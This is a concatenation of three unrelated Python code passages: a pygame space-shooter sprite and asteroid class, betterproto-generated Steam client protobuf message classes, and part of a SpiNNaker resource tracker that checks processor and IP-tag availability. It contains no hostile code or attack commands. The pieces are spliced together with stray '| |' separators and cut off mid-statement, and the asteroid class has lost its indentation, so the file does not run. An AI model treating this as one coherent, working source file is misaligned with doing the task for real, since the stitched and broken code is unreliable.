        True; it selects which animation sequence is used, while the frame
        counters select the image within that sequence.

        Args
            left_right_frame (int): incrementing counter selecting the frame while moving right/left
            center_frame (int): incrementing counter selecting the frame when not turning
            most_recent_key (str): most recently pressed movement key ('r' or 'l')
            window (pygame Surface): screen on which the image is displayed
        '''
        if self.center == True:
            # For the first few frames after releasing a key, play the
            # transition images in reverse so the ship levels out smoothly.
            if left_right_frame < 4:
                if most_recent_key == 'r':
                    window.blit(self.strafing_right_images[left_right_frame],
                                (self.x, self.y))  # level out spaceship upon returning to center
                elif most_recent_key == 'l':
                    window.blit(self.strafing_left_images[left_right_frame],
                                (self.x, self.y))  # level out spacehip upon returning to center
            else:
                window.blit(self.center_images[center_frame],
                            (self.x, self.y))  # iterate through displaying center images
        elif self.right == True:
            if left_right_frame < 4:  # first 4 frames are transition state
                window.blit(self.strafing_right_images[left_right_frame],
                            (self.x, self.y))  # draw strafe right transition
            else:
                # Modulo cycles through the 4 full-strafe frames indefinitely.
                window.blit(self.strafe_right_on[left_right_frame % 4],
                            (self.x, self.y))  # draw final strafe right
        elif self.left == True:
            if left_right_frame < 4:  # first 4 frames are transition state
                window.blit(self.strafing_left_images[left_right_frame],
                            (self.x, self.y))  # draw strafe left transition
            else:
                window.blit(self.strafe_left_on[left_right_frame % 4],
                            (self.x, self.y))  # draw final strafe left

    def move_left(self, boundary):
        '''Move character left by the velocity amount, stopping at x = 0.

        Args
            boundary (Boundary obj): accepted for symmetry with move_right;
                the left limit is simply x > 0.
        '''
        if self.x > 0:  # keeping x coordinate within the bounds of the screen
            self.x = self.x - self.velocity  # move by velocity amt

    def move_right(self, boundary):
        '''Move character right by the velocity amount.

        Args
            boundary (Boundary obj): Boundary width is used to know movement limit
        '''
        if self.x < boundary.width - self.width:
            self.x = self.x + self.velocity

    def shoot(self, shot_type):
        '''Generate a ShooterObject at the center position of the main sprite.

        Args
            shot_type (str): specifies the type of shot generated. Could be used to change shot types in future use.
        '''
        # generate shot object at current sprite location, in the middle of the sprite
        ShooterObject.shots_queue.append(ShooterObject(shot_type, (self.x + (self.width/2)), self.y))
class Asteroid:
'''Asteroid class generates asteroids images above the display height and progresses them downward
Class Attributes
astoird_images (dict): dictionary of asteroid pygame images with keys specifying the size of the asteroid
width_options (list): list containing the various width options
ast_diff_setting (dict): dictionary for difficulty setting.
Keys are levels of difficult and values are average number of game loops per asteroid generation
current_setting (int): current difficulty setting
maximum_asteroid_amount (int): limit on the current number of existing asteroid
Attributes
width (int): width of asteroid choosen
color_option (int): color of asteroid choosen
y (int): y coordinate of asteroid spawn
x (int): x coordinate of asteroid spawn
velocity (int): speed at which asteroid progresses down screen
damage_taken (int): amount of damage sustained
health_amt (int): amount of health
damage (int): amount of damage dealt
hbar_length (int): length of health bar
initial_health_width (int): length of health bar as a constant
destruction method (None): method by which the asteroid has been destroyed
'''
asteroid_images = {50:[pygame.image.load('Asteroids/res50.png'),pygame.image.load('Asteroids/res50_1.png'),pygame.image.load('Asteroids/res50_2.png'),pygame.image.load('Asteroids/res50_3.png'),pygame.image.load('Asteroids/res50_4.png')],\
60:[pygame.image.load('Asteroids/res60.png'),pygame.image.load('Asteroids/res60_1.png'),pygame.image.load('Asteroids/res60_2.png'),pygame.image.load('Asteroids/res60_3.png'),pygame.image.load('Asteroids/res60_4.png')],\
70:[pygame.image.load('Asteroids/res70.png'),pygame.image.load('Asteroids/res70_1.png'),pygame.image.load('Asteroids/res70_2.png'),pygame.image.load('Asteroids/res70_3.png'),pygame.image.load('Asteroids/res70_4.png')],\
80:[pygame.image.load('Asteroids/res80.png'),pygame.image.load('Asteroids/res80_1.png'),pygame.image.load('Asteroids/res80_2.png'),pygame.image.load('Asteroids/res80_3.png'),pygame.image.load('Asteroids/res80_4.png')],\
90:[pygame.image.load('Asteroids/res90.png'),pygame.image.load('Asteroids/res90_1.png'),pygame.image.load('Asteroids/res90_2.png'),pygame.image.load('Asteroids/res90_3.png'),pygame.image.load('Asteroids/res90_4.png')],\
100:[pygame.image.load('Asteroids/res100.png'),pygame.image.load('Asteroids/res100_1.png'),pygame.image.load('Asteroids/res100_2.png'),pygame.image.load('Asteroids/res100_3.png'),pygame.image.load('Asteroids/res100_4.png')]}
width_options = [x for x in range(50,110,10)]
asteroid_lst = []
ast_diff_setting = {1:1000, 2:800, 3: 600, 4: 400, 5:200, 6:100, 7:50}
current_setting = 6
maximum_asteroid_amount = 9
def __init__(self):
self.width = random.choice(Asteroid.width_options) # randomly choosing width option from width_options
self.color_option = random.randint(0,4) # randomly choosing an index number to pick from various images
self.y = self.width*-1 # spawns asteroids above game window
self.x = random.randrange(50, 500 - self.width) # asteroid spawn anywhere in x direction within game boundaries
if self.width < 80: # velocity is loosley tied to width
self.velocity = random.randint(2,3)
else:
self.velocity = random.randint(1,2)
self.damage_taken = 0 # the total health remains unchanged and is used to generate health bar ratio
self.health_amt = self.width*2 # health amount is directly related to the size of the asteroid
self.damage = self.width * 2 # damage dealt by asteroid is tied to size
self.hbar_length = round(self.width * 0.75) # constant length (should add up from the summations of health and damage bar widths)
self.hbar = round(self.hbar_length *
(self.health_amt/(self.health_amt + self.damage_taken))) # hbar length multiplied by percentage remaining
self.initial_health_width = self.hbar # new variable so that changing hbar will not affect the initial length of health bar
self.destruction_method = None # either destroyed by negative health or making contact with mothership
Asteroid.asteroid_lst.append(self)
def draw_asteroid(self, surface):
'''Draw asteroid on screen
Args
surface (boundary obj): surface upon which the asteroid is drawn
'''
surface.blit(Asteroid.asteroid_images[self.width][self.color_option], (self.x, self.y))
# creating damage bar (red)
if self.damage_taken > 0:
pygame.draw.rect(surface, (255,0,0), (self.x + round(self.width*0.1), round(self.y + self.width/2),
self.initial_health_width, 7))
# avialable health (green) is dependent on the ratio of health remaining to damage taken
pygame.draw.rect(surface, (0,255,0), (self.x + round(self.width*0.1), | |
# Generated by the protocol buffer compiler. DO NOT EDIT!
# sources: steammessages_parental.steamclient.proto
# plugin: python-betterproto
# Last updated 09/09/2021
from dataclasses import dataclass
from typing import List
import betterproto
class EProfileCustomizationType(betterproto.Enum):
Invalid = 0
RareAchievementShowcase = 1
GameCollector = 2
ItemShowcase = 3
TradeShowcase = 4
Badges = 5
FavoriteGame = 6
ScreenshotShowcase = 7
CustomText = 8
FavoriteGroup = 9
Recommendation = 10
WorkshopItem = 11
MyWorkshop = 12
ArtworkShowcase = 13
VideoShowcase = 14
Guides = 15
MyGuides = 16
Achievements = 17
Greenlight = 18
MyGreenlight = 19
Salien = 20
LoyaltyRewardReactions = 21
SingleArtworkShowcase = 22
AchievementsCompletionist = 23
class EBanContentCheckResult(betterproto.Enum):
NotScanned = 0
Reset = 1
NeedsChecking = 2
VeryUnlikely = 5
Unlikely = 30
Possible = 50
Likely = 75
VeryLikely = 100
class EProfileCustomizationStyle(betterproto.Enum):
Default = 0
Selected = 1
Rarest = 2
MostRecent = 3
Random = 4
HighestRated = 5
class EAgreementType(betterproto.Enum):
Invalid = -1
GlobalSSA = 0
ChinaSSA = 1
class ENotificationSetting(betterproto.Enum):
UseDefault = 0
Always = 1
Never = 2
class ETextFilterSetting(betterproto.Enum):
SteamLabOptedOut = 0
Enabled = 1
EnabledAllowProfanity = 2
Disabled = 3
@dataclass(eq=False, repr=False)
class GetMutualFriendsForIncomingInvitesRequest(betterproto.Message):
pass
@dataclass(eq=False, repr=False)
class IncomingInviteMutualFriendList(betterproto.Message):
steamid: int = betterproto.fixed64_field(1)
mutual_friend_account_ids: List[int] = betterproto.uint32_field(2)
@dataclass(eq=False, repr=False)
class GetMutualFriendsForIncomingInvitesResponse(betterproto.Message):
incoming_invite_mutual_friends_lists: List["IncomingInviteMutualFriendList"] = betterproto.message_field(1)
@dataclass(eq=False, repr=False)
class GetOwnedGamesRequest(betterproto.Message):
steamid: int = betterproto.uint64_field(1)
include_appinfo: bool = betterproto.bool_field(2)
include_played_free_games: bool = betterproto.bool_field(3)
appids_filter: List[int] = betterproto.uint32_field(4)
include_free_sub: bool = betterproto.bool_field(5)
skip_unvetted_apps: bool = betterproto.bool_field(6)
@dataclass(eq=False, repr=False)
class GetOwnedGamesResponse(betterproto.Message):
game_count: int = betterproto.uint32_field(1)
games: List["GetOwnedGamesResponseGame"] = betterproto.message_field(2)
@dataclass(eq=False, repr=False)
class GetOwnedGamesResponseGame(betterproto.Message):
appid: int = betterproto.int32_field(1)
name: str = betterproto.string_field(2)
playtime_2_weeks: int = betterproto.int32_field(3)
playtime_forever: int = betterproto.int32_field(4)
img_icon_url: str = betterproto.string_field(5)
img_logo_url: str = betterproto.string_field(6)
has_community_visible_stats: bool = betterproto.bool_field(7)
playtime_windows_forever: int = betterproto.int32_field(8)
playtime_mac_forever: int = betterproto.int32_field(9)
playtime_linux_forever: int = betterproto.int32_field(10)
@dataclass(eq=False, repr=False)
class GetPlayNextRequest(betterproto.Message):
max_age_seconds: int = betterproto.uint32_field(1)
ignore_appids: List[int] = betterproto.uint32_field(2)
@dataclass(eq=False, repr=False)
class GetPlayNextResponse(betterproto.Message):
last_update_time: int = betterproto.uint32_field(1)
appids: List[int] = betterproto.uint32_field(2)
@dataclass(eq=False, repr=False)
class GetFriendsGameplayInfoRequest(betterproto.Message):
appid: int = betterproto.uint32_field(1)
@dataclass(eq=False, repr=False)
class GetFriendsGameplayInfoResponse(betterproto.Message):
your_info: "GetFriendsGameplayInfoResponseOwnGameplayInfo" = betterproto.message_field(1)
in_game: List["GetFriendsGameplayInfoResponseFriendsGameplayInfo"] = betterproto.message_field(2)
played_recently: List["GetFriendsGameplayInfoResponseFriendsGameplayInfo"] = betterproto.message_field(3)
played_ever: List["GetFriendsGameplayInfoResponseFriendsGameplayInfo"] = betterproto.message_field(4)
owns: List["GetFriendsGameplayInfoResponseFriendsGameplayInfo"] = betterproto.message_field(5)
in_wishlist: List["GetFriendsGameplayInfoResponseFriendsGameplayInfo"] = betterproto.message_field(6)
@dataclass(eq=False, repr=False)
class GetFriendsGameplayInfoResponseFriendsGameplayInfo(betterproto.Message):
steamid: int = betterproto.fixed64_field(1)
minutes_played: int = betterproto.uint32_field(2)
minutes_played_forever: int = betterproto.uint32_field(3)
@dataclass(eq=False, repr=False)
class GetFriendsGameplayInfoResponseOwnGameplayInfo(betterproto.Message):
steamid: int = betterproto.fixed64_field(1)
minutes_played: int = betterproto.uint32_field(2)
minutes_played_forever: int = betterproto.uint32_field(3)
in_wishlist: bool = betterproto.bool_field(4)
owned: bool = betterproto.bool_field(5)
@dataclass(eq=False, repr=False)
class GetFriendsAppsActivityRequest(betterproto.Message):
news_language: str = betterproto.string_field(1)
request_flags: int = betterproto.uint32_field(2)
@dataclass(eq=False, repr=False)
class GetFriendsAppsActivityResponse(betterproto.Message):
trending: List["GetFriendsAppsActivityResponseAppFriendsInfo"] = betterproto.message_field(1)
recent_purchases: List["GetFriendsAppsActivityResponseAppFriendsInfo"] = betterproto.message_field(2)
unowned: List["GetFriendsAppsActivityResponseAppFriendsInfo"] = betterproto.message_field(3)
popular: List["GetFriendsAppsActivityResponseAppFriendsInfo"] = betterproto.message_field(4)
dont_forget: List["GetFriendsAppsActivityResponseAppFriendsInfo"] = betterproto.message_field(5)
being_discussed: List["GetFriendsAppsActivityResponseAppFriendsInfo"] = betterproto.message_field(6)
new_to_group: List["GetFriendsAppsActivityResponseAppFriendsInfo"] = betterproto.message_field(7)
returned_to_group: List["GetFriendsAppsActivityResponseAppFriendsInfo"] = betterproto.message_field(8)
active_friend_count: int = betterproto.uint32_field(9)
@dataclass(eq=False, repr=False)
class GetFriendsAppsActivityResponseFriendPlayTime(betterproto.Message):
steamid: int = betterproto.fixed64_field(1)
minutes_played_this_week: int = betterproto.uint32_field(2)
minutes_played_two_weeks: int = betterproto.uint32_field(3)
minutes_played_forever: int = betterproto.uint32_field(4)
event_count: int = betterproto.uint32_field(5)
@dataclass(eq=False, repr=False)
class GetFriendsAppsActivityResponseAppFriendsInfo(betterproto.Message):
appid: int = betterproto.uint32_field(1)
friends: List["GetFriendsAppsActivityResponseFriendPlayTime"] = betterproto.message_field(2)
display_order: int = betterproto.uint32_field(3)
@dataclass(eq=False, repr=False)
class GetGameBadgeLevelsRequest(betterproto.Message):
appid: int = betterproto.uint32_field(1)
@dataclass(eq=False, repr=False)
class GetGameBadgeLevelsResponse(betterproto.Message):
player_level: int = betterproto.uint32_field(1)
badges: List["GetGameBadgeLevelsResponseBadge"] = betterproto.message_field(2)
@dataclass(eq=False, repr=False)
class GetGameBadgeLevelsResponseBadge(betterproto.Message):
level: int = betterproto.int32_field(1)
series: int = betterproto.int32_field(2)
border_color: int = betterproto.uint32_field(3)
@dataclass(eq=False, repr=False)
class GetProfileBackgroundRequest(betterproto.Message):
steamid: int = betterproto.fixed64_field(1)
language: str = betterproto.string_field(2)
@dataclass(eq=False, repr=False)
class ProfileItem(betterproto.Message):
communityitemid: int = betterproto.uint64_field(1)
image_small: str = betterproto.string_field(2)
image_large: str = betterproto.string_field(3)
name: str = betterproto.string_field(4)
item_title: str = betterproto.string_field(5)
item_description: str = betterproto.string_field(6)
appid: int = betterproto.uint32_field(7)
item_type: int = betterproto.uint32_field(8)
item_class: int = betterproto.uint32_field(9)
movie_webm: str = betterproto.string_field(10)
movie_mp4: str = betterproto.string_field(11)
movie_webm_small: str = betterproto.string_field(13)
movie_mp4_small: str = betterproto.string_field(14)
equipped_flags: int = betterproto.uint32_field(12)
@dataclass(eq=False, repr=False)
class GetProfileBackgroundResponse(betterproto.Message):
profile_background: "ProfileItem" = betterproto.message_field(1)
@dataclass(eq=False, repr=False)
class SetProfileBackgroundRequest(betterproto.Message):
communityitemid: int = betterproto.uint64_field(1)
@dataclass(eq=False, repr=False)
class SetProfileBackgroundResponse(betterproto.Message):
pass
@dataclass(eq=False, repr=False)
class GetMiniProfileBackgroundRequest(betterproto.Message):
steamid: int = betterproto.fixed64_field(1)
language: str = betterproto.string_field(2)
@dataclass(eq=False, repr=False)
class GetMiniProfileBackgroundResponse(betterproto.Message):
profile_background: "ProfileItem" = betterproto.message_field(1)
@dataclass(eq=False, repr=False)
class SetMiniProfileBackgroundRequest(betterproto.Message):
communityitemid: int = betterproto.uint64_field(1)
@dataclass(eq=False, repr=False)
class SetMiniProfileBackgroundResponse(betterproto.Message):
pass
@dataclass(eq=False, repr=False)
class GetAvatarFrameRequest(betterproto.Message):
steamid: int = betterproto.fixed64_field(1)
language: str = betterproto.string_field(2)
@dataclass(eq=False, repr=False)
class GetAvatarFrameResponse(betterproto.Message):
avatar_frame: "ProfileItem" = betterproto.message_field(1)
@dataclass(eq=False, repr=False)
class SetAvatarFrameRequest(betterproto.Message):
communityitemid: int = betterproto.uint64_field(1)
@dataclass(eq=False, repr=False)
class SetAvatarFrameResponse(betterproto.Message):
pass
@dataclass(eq=False, repr=False)
class GetAnimatedAvatarRequest(betterproto.Message):
steamid: int = betterproto.fixed64_field(1)
language: str = betterproto.string_field(2)
@dataclass(eq=False, repr=False)
class GetAnimatedAvatarResponse(betterproto.Message):
avatar: "ProfileItem" = betterproto.message_field(1)
@dataclass(eq=False, repr=False)
class SetAnimatedAvatarRequest(betterproto.Message):
communityitemid: int = betterproto.uint64_field(1)
@dataclass(eq=False, repr=False)
class SetAnimatedAvatarResponse(betterproto.Message):
pass
@dataclass(eq=False, repr=False)
class GetProfileItemsOwnedRequest(betterproto.Message):
language: str = betterproto.string_field(1)
@dataclass(eq=False, repr=False)
class GetProfileItemsOwnedResponse(betterproto.Message):
profile_backgrounds: List["ProfileItem"] = betterproto.message_field(1)
mini_profile_backgrounds: List["ProfileItem"] = betterproto.message_field(2)
avatar_frames: List["ProfileItem"] = betterproto.message_field(3)
animated_avatars: List["ProfileItem"] = betterproto.message_field(4)
profile_modifiers: List["ProfileItem"] = betterproto.message_field(5)
@dataclass(eq=False, repr=False)
class GetProfileItemsEquippedRequest(betterproto.Message):
steamid: int = betterproto.fixed64_field(1)
language: str = betterproto.string_field(2)
@dataclass(eq=False, repr=False)
class GetProfileItemsEquippedResponse(betterproto.Message):
profile_background: "ProfileItem" = betterproto.message_field(1)
mini_profile_background: "ProfileItem" = betterproto.message_field(2)
avatar_frame: "ProfileItem" = betterproto.message_field(3)
animated_avatar: "ProfileItem" = betterproto.message_field(4)
profile_modifier: "ProfileItem" = betterproto.message_field(5)
@dataclass(eq=False, repr=False)
class SetEquippedProfileItemFlagsRequest(betterproto.Message):
communityitemid: int = betterproto.uint64_field(1)
flags: int = betterproto.uint32_field(2)
@dataclass(eq=False, repr=False)
class SetEquippedProfileItemFlagsResponse(betterproto.Message):
pass
@dataclass(eq=False, repr=False)
class GetEmoticonListRequest(betterproto.Message):
pass
@dataclass(eq=False, repr=False)
class GetEmoticonListResponse(betterproto.Message):
emoticons: List["GetEmoticonListResponseEmoticon"] = betterproto.message_field(1)
@dataclass(eq=False, repr=False)
class GetEmoticonListResponseEmoticon(betterproto.Message):
name: str = betterproto.string_field(1)
count: int = betterproto.int32_field(2)
time_last_used: int = betterproto.uint32_field(3)
use_count: int = betterproto.uint32_field(4)
time_received: int = betterproto.uint32_field(5)
appid: int = betterproto.uint32_field(6)
@dataclass(eq=False, repr=False)
class GetAchievementsProgressRequest(betterproto.Message):
steamid: int = betterproto.uint64_field(1)
language: str = betterproto.string_field(2)
appids: List[int] = betterproto.uint32_field(3)
@dataclass(eq=False, repr=False)
class GetAchievementsProgressResponse(betterproto.Message):
achievement_progress: List["GetAchievementsProgressResponseAchievementProgress"] = betterproto.message_field(1)
@dataclass(eq=False, repr=False)
class GetAchievementsProgressResponseAchievementProgress(betterproto.Message):
appid: int = betterproto.uint32_field(1)
unlocked: int = betterproto.uint32_field(2)
total: int = betterproto.uint32_field(3)
percentage: float = betterproto.float_field(4)
all_unlocked: bool = betterproto.bool_field(5)
cache_time: int = betterproto.uint32_field(6)
@dataclass(eq=False, repr=False)
class GetFavoriteBadgeRequest(betterproto.Message):
steamid: int = betterproto.uint64_field(1)
@dataclass(eq=False, repr=False)
class GetFavoriteBadgeResponse(betterproto.Message):
has_favorite_badge: bool = betterproto.bool_field(1)
badgeid: int = betterproto.uint32_field(2)
communityitemid: int = betterproto.uint64_field(3)
item_type: int = betterproto.uint32_field(4)
border_color: int = betterproto.uint32_field(5)
appid: int = betterproto.uint32_field(6)
level: int = betterproto.uint32_field(7)
@dataclass(eq=False, repr=False)
class SetFavoriteBadgeRequest(betterproto.Message):
communityitemid: int = betterproto.uint64_field(1)
badgeid: int = betterproto.uint32_field(2)
@dataclass(eq=False, repr=False)
class SetFavoriteBadgeResponse(betterproto.Message):
pass
@dataclass(eq=False, repr=False)
class GetProfileCustomizationRequest(betterproto.Message):
steamid: int = betterproto.fixed64_field(1)
include_inactive_customizations: bool = betterproto.bool_field(2)
include_purchased_customizations: bool = betterproto.bool_field(3)
@dataclass(eq=False, repr=False)
class ProfileCustomizationSlot(betterproto.Message):
slot: int = betterproto.uint32_field(1)
appid: int = betterproto.uint32_field(2)
publishedfileid: int = betterproto.uint64_field(3)
item_assetid: int = betterproto.uint64_field(4)
item_contextid: int = betterproto.uint64_field(5)
notes: str = betterproto.string_field(6)
title: str = betterproto.string_field(7)
accountid: int = betterproto.uint32_field(8)
badgeid: int = betterproto.uint32_field(9)
border_color: int = betterproto.uint32_field(10)
item_classid: int = betterproto.uint64_field(11)
item_instanceid: int = betterproto.uint64_field(12)
ban_check_result: "EBanContentCheckResult" = betterproto.enum_field(13)
@dataclass(eq=False, repr=False)
class ProfileCustomization(betterproto.Message):
customization_type: "EProfileCustomizationType" = betterproto.enum_field(1)
large: bool = betterproto.bool_field(2)
slots: List["ProfileCustomizationSlot"] = betterproto.message_field(3)
active: bool = betterproto.bool_field(4)
customization_style: "EProfileCustomizationStyle" = betterproto.enum_field(5)
purchaseid: int = betterproto.uint64_field(6)
level: int = betterproto.uint32_field(7)
@dataclass(eq=False, repr=False)
class ProfileTheme(betterproto.Message):
theme_id: str = betterproto.string_field(1)
title: str = betterproto.string_field(2)
@dataclass(eq=False, repr=False)
class ProfilePreferences(betterproto.Message):
hide_profile_awards: bool = betterproto.bool_field(1)
@dataclass(eq=False, repr=False)
class GetProfileCustomizationResponse(betterproto.Message):
customizations: List["ProfileCustomization"] = betterproto.message_field(1)
slots_available: int = betterproto.uint32_field(2)
profile_theme: "ProfileTheme" = betterproto.message_field(3)
purchased_customizations: List["GetProfileCustomizationResponsePurchasedCustomization"] = betterproto.message_field(
4
)
profile_preferences: "ProfilePreferences" = betterproto.message_field(5)
@dataclass(eq=False, repr=False)
class GetProfileCustomizationResponsePurchasedCustomization(betterproto.Message):
purchaseid: int = betterproto.uint64_field(1)
customization_type: "EProfileCustomizationType" = betterproto.enum_field(2)
level: int = betterproto.uint32_field(3)
@dataclass(eq=False, repr=False)
class GetPurchasedProfileCustomizationsRequest(betterproto.Message):
steamid: int = betterproto.fixed64_field(1)
@dataclass(eq=False, repr=False)
class GetPurchasedProfileCustomizationsResponse(betterproto.Message):
purchased_customizations: List[
"GetPurchasedProfileCustomizationsResponsePurchasedCustomization"
] = betterproto.message_field(1)
@dataclass(eq=False, repr=False)
class GetPurchasedProfileCustomizationsResponsePurchasedCustomization(betterproto.Message):
purchaseid: int = betterproto.uint64_field(1)
customization_type: "EProfileCustomizationType" = betterproto.enum_field(2)
@dataclass(eq=False, repr=False)
class GetPurchasedAndUpgradedProfileCustomizationsRequest(betterproto.Message):
steamid: int = betterproto.fixed64_field(1)
@dataclass(eq=False, repr=False)
class GetPurchasedAndUpgradedProfileCustomizationsResponse(betterproto.Message):
purchased_customizations: List[
"GetPurchasedAndUpgradedProfileCustomizationsResponsePurchasedCustomization"
] = betterproto.message_field(1)
upgraded_customizations: List[
"GetPurchasedAndUpgradedProfileCustomizationsResponseUpgradedCustomization"
] = betterproto.message_field(2)
@dataclass(eq=False, repr=False)
class GetPurchasedAndUpgradedProfileCustomizationsResponsePurchasedCustomization(betterproto.Message):
customization_type: "EProfileCustomizationType" = betterproto.enum_field(1)
count: int = betterproto.uint32_field(2)
@dataclass(eq=False, repr=False)
class GetPurchasedAndUpgradedProfileCustomizationsResponseUpgradedCustomization(betterproto.Message):
customization_type: "EProfileCustomizationType" = betterproto.enum_field(1)
level: int = betterproto.uint32_field(2)
@dataclass(eq=False, repr=False)
class GetProfileThemesAvailableRequest(betterproto.Message):
pass
@dataclass(eq=False, repr=False)
class GetProfileThemesAvailableResponse(betterproto.Message):
profile_themes: List["ProfileTheme"] = betterproto.message_field(1)
@dataclass(eq=False, repr=False)
class SetProfileThemeRequest(betterproto.Message):
theme_id: str = betterproto.string_field(1)
@dataclass(eq=False, repr=False)
class SetProfileThemeResponse(betterproto.Message):
pass
@dataclass(eq=False, repr=False)
class SetProfilePreferencesRequest(betterproto.Message):
profile_preferences: "ProfilePreferences" = betterproto.message_field(1)
@dataclass(eq=False, repr=False)
class SetProfilePreferencesResponse(betterproto.Message):
pass
@dataclass(eq=False, repr=False)
class PostStatusToFriendsRequest(betterproto.Message):
appid: int = betterproto.uint32_field(1)
status_text: str = betterproto.string_field(2)
@dataclass(eq=False, repr=False)
class PostStatusToFriendsResponse(betterproto.Message):
pass
@dataclass(eq=False, repr=False)
class GetPostedStatusRequest(betterproto.Message):
steamid: int = betterproto.uint64_field(1)
postid: int = betterproto.uint64_field(2)
@dataclass(eq=False, repr=False)
class GetPostedStatusResponse(betterproto.Message):
accountid: int = betterproto.uint32_field(1)
postid: int = betterproto.uint64_field(2)
status_text: str = betterproto.string_field(3)
deleted: bool = betterproto.bool_field(4)
appid: int = betterproto.uint32_field(5)
@dataclass(eq=False, repr=False)
class DeletePostedStatusRequest(betterproto.Message):
postid: int = betterproto.uint64_field(1)
@dataclass(eq=False, repr=False)
class DeletePostedStatusResponse(betterproto.Message):
pass
@dataclass(eq=False, repr=False)
class GetLastPlayedTimesRequest(betterproto.Message):
min_last_played: int = betterproto.uint32_field(1)
@dataclass(eq=False, repr=False)
class GetLastPlayedTimesResponse(betterproto.Message):
games: List["GetLastPlayedTimesResponseGame"] = betterproto.message_field(1)
@dataclass(eq=False, repr=False)
class GetLastPlayedTimesResponseGame(betterproto.Message):
appid: int = betterproto.int32_field(1)
last_playtime: int = betterproto.uint32_field(2)
playtime_2_weeks: int = betterproto.int32_field(3)
playtime_forever: int = betterproto.int32_field(4)
first_playtime: int = betterproto.uint32_field(5)
playtime_windows_forever: int = betterproto.int32_field(6)
playtime_mac_forever: int = betterproto.int32_field(7)
playtime_linux_forever: int = betterproto.int32_field(8)
first_windows_playtime: int = betterproto.uint32_field(9)
first_mac_playtime: int = betterproto.uint32_field(10)
first_linux_playtime: int = betterproto.uint32_field(11)
last_windows_playtime: int = betterproto.uint32_field(12)
last_mac_playtime: int = betterproto.uint32_field(13)
last_linux_playtime: int = betterproto.uint32_field(14)
@dataclass(eq=False, repr=False)
class AcceptSsaRequest(betterproto.Message):
agreement_type: "EAgreementType" = betterproto.enum_field(1)
time_signed_utc: int = betterproto.uint32_field(2)
@dataclass(eq=False, repr=False)
class AcceptSsaResponse(betterproto.Message):
pass
@dataclass(eq=False, repr=False)
class GetNicknameListRequest(betterproto.Message):
pass
@dataclass(eq=False, repr=False)
class GetNicknameListResponse(betterproto.Message):
nicknames: List["GetNicknameListResponsePlayerNickname"] = betterproto.message_field(1)
@dataclass(eq=False, repr=False)
class GetNicknameListResponsePlayerNickname(betterproto.Message):
accountid: int = betterproto.fixed32_field(1)
nickname: str = betterproto.string_field(2)
@dataclass(eq=False, repr=False)
class GetPerFriendPreferencesRequest(betterproto.Message):
pass
@dataclass(eq=False, repr=False)
class PerFriendPreferences(betterproto.Message):
accountid: int = betterproto.fixed32_field(1)
nickname: str = betterproto.string_field(2)
notifications_showingame: "ENotificationSetting" = betterproto.enum_field(3)
notifications_showonline: "ENotificationSetting" = betterproto.enum_field(4)
notifications_showmessages: "ENotificationSetting" = betterproto.enum_field(5)
sounds_showingame: "ENotificationSetting" = betterproto.enum_field(6)
sounds_showonline: "ENotificationSetting" = betterproto.enum_field(7)
sounds_showmessages: "ENotificationSetting" = betterproto.enum_field(8)
notifications_sendmobile: "ENotificationSetting" = betterproto.enum_field(9)
@dataclass(eq=False, repr=False)
class GetPerFriendPreferencesResponse(betterproto.Message):
preferences: List["PerFriendPreferences"] = betterproto.message_field(1)
@dataclass(eq=False, | |
int or None
:param resources: The resources to be allocated
:type resources:\
:py:class:`pacman.model.resources.resource_container.ResourceContainer`
:return: True if there is a core available given the constraints, or\
False otherwise
:rtype: bool
"""
# TODO: Check the resources can be met with the processor
# Currently assumes all processors are equal and that resources
# haven't been over allocated
if processor_id is not None:
if (key in self._core_tracker and
processor_id not in self._core_tracker[key]):
return False
elif key not in self._core_tracker:
processor = chip.get_processor_with_id(processor_id)
return processor is not None and not processor.is_monitor
elif key in self._core_tracker:
return len(self._core_tracker[key]) != 0
return True
def _get_matching_ip_tag(self, board_address, tag, key):
""" Locate a tag for a tag id on a board address for a given chip
:param board_address: the board address to locate the chip on
:type board_address: str or None
:param tag: the tag id to locate
:type tag: int or None
:param key: The (x, y) coordinates of the chip
:type key: tuple of (int int)
:return: A board address and tag id, or None, None if none
:rtype: tuple of (str, int) or (None, None)
"""
if key not in self._ip_tags_address_and_port:
return None, None
existing_tags = self._ip_tags_address_and_port[key]
if board_address is None and tag is not None:
for (b_address, a_tag) in existing_tags:
if a_tag == tag:
return b_address, a_tag
elif board_address is not None and tag is None:
for (b_address, a_tag) in existing_tags:
if b_address == board_address:
return b_address, a_tag
elif board_address is None and tag is None:
return iter(existing_tags).next()
elif (board_address, tag) in existing_tags:
return board_address, tag
return None, None
def _is_tag_available(self, board_address, tag):
""" Check if a tag is available given the constraints
:param board_address: the board address to locate the chip on
:type board_address: str or None
:param tag: the tag id to locate
:type tag: int or None
:return: True if the tag is available, False otherwise
:rtype: bool
"""
if board_address is None and tag is not None:
for board_address in self._boards_with_ip_tags:
if (board_address not in self._tags_by_board or
tag in self._tags_by_board[board_address]):
return True
return False
elif board_address is not None and tag is None:
return board_address in self._boards_with_ip_tags
elif board_address is None and tag is None:
return len(self._boards_with_ip_tags) > 0
return (board_address not in self._tags_by_board or
tag in self._tags_by_board[board_address])
def _is_ip_tag_available(self, board_address, tag, ip_address, port,
strip_sdp):
""" Check if an iptag is available given the constraints
:param board_address: the board address to locate the chip on
:type board_address: str or None
:param tag: the tag id to locate
:type tag: int or None
:param ip_address: the ip address of the tag to be assigned
:type ip_address: str
:param port: the port number of the tag to be assigned
:type port: int
:param strip_sdp: if the iptag has to be able to strip the SDP header
:type strip_sdp: bool
:return: True if a matching iptag is available, False otherwise
:rtype: bool
"""
# If something is already sending to the same ip address and port but
# is performing the opposite operation for strip SDP, then no tag can
# be allocated
reverse_strip_key = (ip_address, port, not strip_sdp)
if reverse_strip_key in self._ip_tags_address_and_port:
return False
# If the same key is being used for another ip tag, re-use it
key = (ip_address, port, strip_sdp)
(b_address, _) = self._get_matching_ip_tag(board_address, tag, key)
if b_address is not None:
return True
# Otherwise determine if another tag is available
return self._is_tag_available(board_address, tag)
def _are_ip_tags_available(self, chip, board_address, ip_tags):
""" Check if the set of tags are available using the given chip,\
given the constraints
:param chip: the (x, y) coordinates of the chip to check
:type chip: (int, int)
:param board_address: the board to allocate ip tags on
:type board_address: str or None
:param ip_tags: The ip tag constraints
:type ip_tags: iterable of\
:py:class:`pacman.model.constraints.tag_allocator_constraints.tag_allocator_require_iptag_constraint.TagAllocatorRequireIptagConstraint`
:return: True if the tags can be allocated, False otherwise
:rtype: bool
"""
# If there are no tags to assign, declare that they are available
if ip_tags is None or len(ip_tags) == 0:
return True
# If there is a fixed board address and the chip is not on the board
# the tags are not available
if (board_address is not None and (chip.x, chip.y)
